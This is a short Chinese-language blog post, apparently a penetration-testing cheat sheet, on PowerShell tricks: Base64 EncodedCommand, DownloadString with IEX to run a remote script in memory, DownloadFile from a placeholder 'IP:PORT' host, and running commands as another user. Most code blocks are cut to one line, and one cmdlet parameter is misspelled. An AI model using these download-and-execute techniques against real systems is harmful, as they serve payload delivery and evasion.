Powershell的用法
Powershell EncodeCommand
由于Powershell中存在单双引号,然而有些时候在应用的时,难免会遇到多个单双引号嵌套[比如在Web中],就涉及到转义的问题。好在Powershell支持Base64编码后的指令使用 -e 或者-Encodedcommand指明后面的指令为编码后的即可。 [toc] [begin]但是![/begin] Poershell的Base64用的是utf 16 little endian编码格式,所以我们在执行Base64编码前需要先将命令重新进行编码
1 | ~ root@kali |
编码完成后就能避免在应用中由于单双引号而引起的种种问题。
1 | PS C:\Users\Anonymous> powershell.exe -e cABpAG4AZwAgADEAMgA3AC4AMAAuADAALgAxAAoA |
Powershell DownloadString
这里downloadstring的意思大概为下载数据流,使用IEX执行。 比如下载ps1脚本时会执行一次该脚本,并不会保留在电脑上。
1 | #这里 -command和-c都行 |
Powershell DownloadFile
DownloadFile顾名思义。
1 | powershell.exe -command (New-Object Net.WebClient).DownloadFile('http://IP:PORT/Flies', 'Flies') |
Run command as another user
1 | $pass = ConvertTo-SecureString "<---PASSWORD HERE--->" -AsPlainTest -Force |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 龟's Blog!